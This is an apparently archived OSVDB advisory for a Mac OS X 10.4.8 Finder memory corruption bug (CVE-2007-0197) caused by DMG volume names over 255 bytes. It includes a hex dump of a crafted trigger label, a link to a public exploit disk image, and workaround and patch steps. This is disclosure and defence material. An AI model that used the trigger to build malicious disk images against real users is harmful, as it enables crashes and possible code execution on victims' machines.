32714 : Apple Mac OS X Finder DMG Disk Image Volume Name Memory Corruption
Printer | http://osvdb.org/32714 | Email This | Edit Vulnerability

Views This Week	Views All Time	Added to OSVDB	Last Modified	Modified (since 2008)	Percent Complete
5	1201	over 4 years ago	over 3 years ago	0 times	90%

Timeline

Disclosure Date	Exploit Publish Date
2007-01-09	2007-01-09

Description

A remote buffer overflow exists in Mac OS X's Finder. Finder fails to properly handle DMG images with volume names of more than 255 bytes, leading to memory corruption. Using a specially crafted DMG disk image, a remote attacker can exploit this vulnerability in order to crash the vulnerable application or possibly execute arbitrary commands with the privileges of the user by serving the malicious file via a web server or convincing the victim to download and mount it.

Classification

Location: Remote / Network Access
Attack Type: Denial of Service, Input Manipulation
Impact: Loss of Integrity, Loss of Availability
Exploit: Exploit Public
Disclosure: OSVDB Verified, Vendor Verified

Technical

Hex dump of an example DMG image volume label that can be used to trigger the issue (by Kevin Finisterre):

0009c00: 4c41 424c be42 0000 0000 0001 4594 86e1 LABL.B......E...
0009c10: 00ff 4141 4141 4141 4141 4141 4141 4141 ..AAAAAAAAAAAAAA
0009c20: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c30: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c40: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c50: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c60: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c70: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c80: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009c90: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ca0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cb0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cc0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cd0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009ce0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009cf0: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d00: 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
0009d10: 4100 0000 0000 0000 0000 0000 0000 0000 A...............

Solution

Download and install Security Update 2007-002, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s):
Do not mount disk images or simply disable Finder and use Spotlight instead. One can disable Finder using the following steps:
1) Open Terminal, found in /Applications -> Utilities
2) Once inside Terminal, type:
'sudo mv /System/Library/CoreServices/Finder.app /Applications/'
3) While still in Terminal type:
killall Finder

In the case that Finder has already been put into a Denial of Service condition one can unmount it using the following command while in Terminal:
hdiutil unmount /Volumes/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/

Products

Apple Computer, Inc.	Mac OS X	10.4.8
Apple Computer, Inc.	Mac OS X Server	10.4.8

References

Security Tracker: 1017662
CVE ID: 2007-0197 (see also: NVD)
Bugtraq ID: 21980
CERT VU: 240880
Secunia Advisory ID: 24198
ISS X-Force ID: 31410
Related OSVDB ID: 32713 32715
VUPEN Advisory: ADV-2007-0140
Vendor Specific News/Changelog Entry: http://docs.info.apple.com/article.html?artnum=305102
Mail List Post: http://lists.apple.com/archives/Security-announce/2007/Feb/msg00000.html
Generic Exploit URL: http://projects.info-pull.com/moab/bug-files/MOAB-09-01-2007.dmg
Other Advisory URL: http://projects.info-pull.com/moab/MOAB-09-01-2007.html
http://www.digitalmunition.com/DMA%5B2007-0109a%5D.txt
Vendor Specific Solution URL: http://www.apple.com/support/downloads/securityupdate2007002ppc.html
US-CERT Cyber Security Alert: TA07-047A

Tools & Filters

	24354

Credit

Kevin Finisterre - kf_listsdigitalmunition.com - Digital Munition

CVSSv2 Score

CVSSv2 Base Score = 6.8
Source: nvd.nist.gov | Generated: 2007-01-11 | Disagree?

Blogs

This product uses the Daylife API but is not endorsed or certified by Daylife.

This section lists the latest news and blogs found via the daylife API (and for older items, the technorati API), which mention or otherwise discuss this vulnerability.

None found at this time

Comments

Add Comment Hide Add Comment

No Comments.

The database information may change without any notice. Use of the information constitutes acceptance for use in an AS IS condition, and there are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. In no event shall the copyright holder or distributor (OSVDB or OSF) be held liable for any damages whatsoever arising out of or in connection with the use or spread of this information.